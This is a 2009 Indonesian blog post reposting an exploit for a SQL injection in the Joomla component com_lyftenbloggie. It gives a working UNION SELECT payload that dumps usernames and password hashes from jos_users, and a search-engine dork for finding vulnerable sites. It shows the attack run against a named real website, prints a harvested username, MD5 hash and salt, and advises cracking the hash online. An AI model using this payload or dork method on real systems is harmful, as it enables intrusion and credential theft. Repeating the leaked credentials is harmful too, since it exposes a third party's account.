SQL Injection Joomla

Rabu, 02 Desember 2009

############################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability – (author)
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
############################################

[ Software Information ]

[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5.
LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:”com_lyftenbloggie” / “Powered by LyftenBloggie”
[+] LOCATION : INDONESIA – JOGJA

############################################

EXPLOIT :
62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--

Wew, dapat dork dari pak dhe.. di indonesiancoder ne..

ok kita bahas dork SQL yang mengusung LyftenBloggie/blog publishing component
(plugin baru kale..)

klo belum tau SQL injection ga papa.. cz dork ini mudah di terapkan
sekarang kita cari target di gogle dengan dork inurl:”com_lyftenbloggie” / “Powered by LyftenBloggie”

Ambil satu contoh :
http://www.liveinlancasterpa.com/index.php?option=com_lyftenbloggie&author=62

Kita sisipkan exploitnya, jadi kayak gini:
http://www.liveinlancasterpa.com/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--

Wew, apa yang kita dapat?
yah kita dapat username dan password
Realty4921:9266997cc1dede121e043c5fb6e4ad53:lwgKy1TtkNiIpdWLJ6ZUKxJB9Me3pwsJ
username : Realty4921
Password : 9266997cc1dede121e043c5fb6e4ad53

Ok dech, tutor ini sekian dulu, untuk password, masih dalam bentuk md5. jadi harus di decrypt. tanya paman gogle aja dengan dork md5 decryptor


Sumber : Indonesiancoder

thanks to:
IndonesianCoder, Yogyacarderlink, Jasakom, Yogyafree, and All Indonesian underground.

Diposting oleh agus windarto di 17.18  

Label: , , ,

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)